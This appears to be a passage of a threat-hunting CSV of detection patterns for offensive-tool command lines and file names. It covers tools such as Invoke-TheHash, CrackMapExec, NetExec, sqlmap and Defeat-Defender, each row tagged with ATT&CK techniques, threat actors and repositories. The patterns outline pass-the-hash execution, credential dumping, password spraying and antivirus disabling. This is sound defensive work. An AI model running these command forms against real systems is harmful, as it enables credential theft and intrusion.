"* tun2socks-openbsd*",".{0,1000}\stun2socks\-openbsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3567"
"* tun2socks-windows*",".{0,1000}\stun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3568"
"* --tunnel-address 127.0.0.1:7171*",".{0,1000}\s\-\-tunnel\-address\s127\.0\.0\.1\:7171.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","3569"
"* tunnel-socks5.py*",".{0,1000}\stunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","3572"
"* TunnelVisionVM.ova*",".{0,1000}\sTunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","3573"
"* tweetshell.sh*",".{0,1000}\stweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","3575"
"* --type asreproast*",".{0,1000}\s\-\-type\sasreproast.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3576"
"* --type enum -uf * --module o365_enum_office*",".{0,1000}\s\-\-type\senum\s\-uf\s.{0,1000}\s\-\-module\so365_enum_office.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","3577"
"* --type search-spn*",".{0,1000}\s\-\-type\ssearch\-spn.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","3578"
"* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBClient\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3579"
"* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBEnum\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3580"
"* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3581"
"* --type spray -uf * -pf *",".{0,1000}\s\-\-type\sspray\s\-uf\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","3582"
"* -type user -search * -DomainController * -Credential * -list yes*",".{0,1000}\s\-type\suser\s\-search\s.{0,1000}\s\-DomainController\s.{0,1000}\s\-Credential\s.{0,1000}\s\-list\syes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3583"
"* -Type WMIExec *",".{0,1000}\s\-Type\sWMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3584"
"* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sWMIExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","3585"
"* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",".{0,1000}\s\-u\s.{0,1000}\s\-d\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-k\s\-\-no\-pass\s\-\-target\s.{0,1000}\s\-\-action\s\""list\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","3586"
"* -u * --local-auth*",".{0,1000}\s\-u\s.{0,1000}\s\-\-local\-auth.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3587"
"* -u * -p * --lusers*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-lusers.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3588"
"* -u * -p * -M handlekatz*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\shandlekatz.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3589"
"* -u * -p * -M nanodump*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\snanodump.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3590"
"* -u * -p * -M ntdsutil*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sntdsutil.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3591"
"* -u * -p * --sam",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3592"
"* -u * -p * --shares*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3593"
"* -u * -p *--pass-pol*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-pass\-pol.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3594"
"* -u *http* --dbs",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3595"
"* -u *http* --os-shell*",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-os\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3596"
"* -u FUZZ *",".{0,1000}\s\-u\sFUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3597"
"* -u http* -f *.dll * -p *",".{0,1000}\s\-u\shttp.{0,1000}\s\-f\s.{0,1000}\.dll\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","3598"
"* -u http* --wordlisturl * -e php,aspx --recursion true*",".{0,1000}\s\-u\shttp.{0,1000}\s\-\-wordlisturl\s.{0,1000}\s\-e\sphp,aspx\s\-\-recursion\strue.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3599"
"* -u jasminadmin -p* jasmin_db *",".{0,1000}\s\-u\sjasminadmin\s\-p.{0,1000}\sjasmin_db\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","3600"
"* -U msf -P msf *",".{0,1000}\s\-U\smsf\s\-P\smsf\s.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","3601"
"* -u wordlist * wordlist_uniq_sorted*",".{0,1000}\s\-u\swordlist\s.{0,1000}\swordlist_uniq_sorted.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","3602"
"* -U:T -ShowWindowMode:Hide reg add *",".{0,1000}\s\-U\:T\s\-ShowWindowMode\:Hide\sreg\sadd\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","3603"
"* UAC-Bypass.ps1*",".{0,1000}\sUAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","3604"
"* -UacMe Elevate -Execute *",".{0,1000}\s\-UacMe\sElevate\s\-Execute\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3605"
"* UAC-TokenMagic.ps1*",".{0,1000}\sUAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","3606"
"* uberfile.py *",".{0,1000}\suberfile\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3607"
"* ubiquiti-discovery.nse*",".{0,1000}\subiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3608"
"* UefiShell.iso*",".{0,1000}\sUefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","3609"
"* UnconstrainedDelegationCheck .ahk*",".{0,1000}\sUnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3611"
"* UnconstrainedDelegationCheck.ahk*",".{0,1000}\sUnconstrainedDelegationCheck\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3612"
"* --unconstrained-users*",".{0,1000}\s\-\-unconstrained\-users.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","3613"
"* unDefender.exe*",".{0,1000}\sunDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","3614"
"* -unhook -antidebug *",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3615"
"* -unhook -antidebug * -self -sleep*",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}\s\-self\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3616"
